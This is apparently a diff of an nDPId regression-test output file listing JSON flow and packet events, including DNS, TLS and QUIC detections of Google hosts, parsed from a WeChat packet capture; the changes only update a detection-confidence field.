+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} -02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} +02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -34,22 +34,22 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1492167350333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167350333,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92D9AAEAR3brAqAFnwKgB\/rP+ADUAKS5MZgIBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1492167350372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1492167350372,"pkt":"eJKcD6iO8IQvSpdgCABFoADcAABAAEARtLvAqAH+wKgBZwA1s\/4AyDQ0ZgKBgAABAAEABAAEA3NzbAdnc3RhdGljA2NvbQAAAQABwAwAAQABAAAAHQAErNkXQ8AQAAIAAQACiyoADQNuczEGZ29vZ2xlwBjAEAACAAEAAosqAAYDbnMywEHAEAACAAEAAosqAAYDbnM0wEHAEAACAAEAAosqAAYDbnMzwEHAPQABAAEABThHAATY7yAKwFYAAQABAAUudQAE2O8iCsB6AAEAAQAFLnUABNjvJArAaAABAAEABS51AATY7yYK"} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167350372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167350372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1492167350385,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167350385,"pkt":"8IQvSpdgeJKcD6iOCABFAAVivyhAAEAR8DbAqAFnrNkXQ8kzAbsFThBpDTHWY7YNkySLUTAzNQEAZRP82mbzhTNOuyagAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\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\/nebVFToqDPqkbsFtGn3MXCPqLWhc6j\/ixUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq2MDAwMDAwMDC6zWefDMewsHm6e\/MeaJgBlt0fDWQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAtqrwWAAAAAA5eOlJA3D70ONW2AJf\/ogbdqDz00OrZf\/OgXQcK6rvrAta8o74ustrYp5ItVHeFC1VJKErdNkin676crWgBJJhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees3ygAAW65hsjHRUCwmcSnHJYniTszHhABKgaojbj7US89crmIZu34dDjUIs9wDqj3f87VRLZoVe0zMx1t+ZFc1SOwYij5LWSM1YcolsQBx9V4iuTevcGsCo1kr3VNCHdz7PtfP9d6GZNrg2+YgXWbXAAnfNe23tKnBUPczWdseoa1PkV+7toc2QUBJDmQV3Doscx5oizBP3jmujZdyIIvaDPKntnnsjC8AAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 
00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1492167350386,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1492167350386,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCvylAAEAR9BXAqAFnrNkXQ8kzAbsBbud7DTHWY7YNkySLUTAzNQLvwr0xyGRZ7meDZlovLzVjAbbzC3jR2f2rSyaEQR29GdHUR3g0xdsFTdTip7X1Nnsf4tYU5MBGkSRYowzYqBAgeAEueiV49O5ngVqvp6AacuKzAzgJV3z622EcXJUEyhTJ+nOIANjFkaDTQTI+jdNEu4FfF\/TnyxM++AGJ3to5M6SWYBz2BeCP\/OGMSC7yUukPIe4sRQeIQcXq+IYSj3PAlHKxZT8HDRP7kjwgghqQy0grhbmgn+9HaZmoQLo9gu4ijkDWy6wUW+W8oMWbJ3Ky6wEFXzApvzV\/FZNjJh6PDtkHubM5JHhhh00iIakeLzopZrU7PnZst39suCb9JKpUYtFvmoJnG3+X2ld76667v+kx3ZpHcdgXPlvpm8rm+2k6Em\/vgF23i7kHM9aRW5K+1InNa4QsADwuokzDCUylLbXZYixDaZtGruoPUyaIkf6OjyLbS2SNBQ=="} 02244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1492167350462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167350462,"pkt":"8IQvSpdgeJKcD6iOCABFAAVivzBAAEAR8C7AqAFnrNkXQ8kzAbsFTm8mDTHWY7YNkySLUTAzNQMCK\/NUmHquSjxA+X2gAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\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\/nebVFToqDPqkbsFtGn3MXCPqLWhc6j\/ixUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq2MDAwMDAwMDC6zWefDMewsHm6e\/MeaJgBlt0fDWQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAtqrwWAAAAAA5eOlJA3D70ONW2AJf\/ogbdqDz00OrZf\/OgXQcK6rvrAta8o74ustrYp5ItVHeFC1VJKErdNkin676crWgBJJhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees3ygAAW65hsjHRUCwmcSnHJYniTszHhABKgaojbj7US89crmIZu34dDjUIs9wDqj3f87VRLZoVe0zMx1t+ZFc1SOwYij5LWSM1YcolsQBx9V4iuTevcGsCo
1kr3VNCHdz7PtfP9d6GZNrg2+YgXWbXAAnfNe23tKnBUPczWdseoa1PkV+7toc2QUBJDmQV3Doscx5oizBP3jmujZdyIIvaDPKntnnsjC8AAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1492167351026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167351026,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92FdAAEAR3aLAqAFnwKgB\/to2ADUAKSL33acBAAABAAAAAAAABGRvY3MGZ29vZ2xlA2NvbQAAAQAB"} 
